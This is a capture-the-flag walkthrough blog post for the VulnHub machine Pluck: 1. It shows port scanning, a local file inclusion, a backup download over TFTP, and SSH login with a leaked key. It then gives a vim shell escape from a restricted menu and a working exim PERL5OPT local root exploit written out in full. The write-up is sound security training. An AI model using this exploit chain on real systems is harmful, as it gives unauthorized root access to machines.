Capture the flag (CTF)

Pluck: 1 CTF Walkthrough

Chiragh Dewan
June 8, 2017 by
Chiragh Dewan

Pluck: 1 is a vulnerable machine created by Ryan Oberto. It surfaced on VulnHub on 11th March 2017. It can be downloaded from https://www.vulnhub.com/entry/pluck-1,178/

The file can be used with VMWare as well as VirtualBox. The machine is Linux based.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

The objective is to read the flag present in the machine with root privileges.

Downloaded and fired up, it presents with a login screen with shows the target IP:

Since we have our target IP, let's scan and see what we can find:

For this case, I am using Zenmap, a GUI version of Nmap. The scan shows us that there are three ports open:

  • Port 22 - Used for SSH
  • Port 80 - Used to serve a web application
  • Port 3306 - Running MySQL

Seeing that port 80 is open, my first instinct was to check what's the server running:

Looking at the URL formed, it made me try to look for LFI (Local File Inclusion), and it worked:

http://172.16.92.142/index.php?page=about.php

Looking at the output, it talks about a user called backup-user whose job is to take periodic backups and store them. Let's see what it shows us:

To get the backup.tar file, I used to connect with TFTP (Trivial File Transfer Protocol) and downloaded the backup.tar file:

$ tftp

tftp> connect 172.16.92.142

tftp> get backup.tar

tftp> quit

On extracting the contents of backup.tar, we see there are two folders:

  • Home
  • Var

$ tar -xvf backup.tar

On further examination, we see that the user Paul, has a few keys up his sleeves:

Let's try to use them and see if any of them works. After trying a few, id_key4 showed the following:

$ ssh -I id_key4 paul@172.16.92.142

Here, we are presented with pdmenu. To get to a shell, go on to Edit file and enter any file name. You will be presented with vim, and to exit to a shell, simply write:

:set shell =/bin/bash

and then type :shell to exit to a shell

Checking about the user and the system, we find:

Now to read the flag, we need to get root privilege. After doing some research, I found the following exploit (https://www.exploit-db.com/exploits/39535/). Simply copying and pasting the following, gave us root:

cat > /tmp/root.pm << EOF

package root;

use strict;

use warnings;

system("/bin/sh");

EOF

PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps


and voila, we have the flag:

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.


Chiragh Dewan
Chiragh Dewan

A creative problem-solving full-stack web developer with expertise in Information Security Audit, Web Application Audit, Vulnerability Assessment, Penetration Testing/ Ethical Hacking as well as previous experience in Artificial Intelligence, Machine Learning, and Natural Language Processing. He has also been recognised by various companies such as Facebook, Google, Microsoft, PayPal, Netflix, Blackberry, etc for reporting various security vulnerabilities. He has also given various talks on Artificial Intelligence and Cyber Security including at an TEDx event.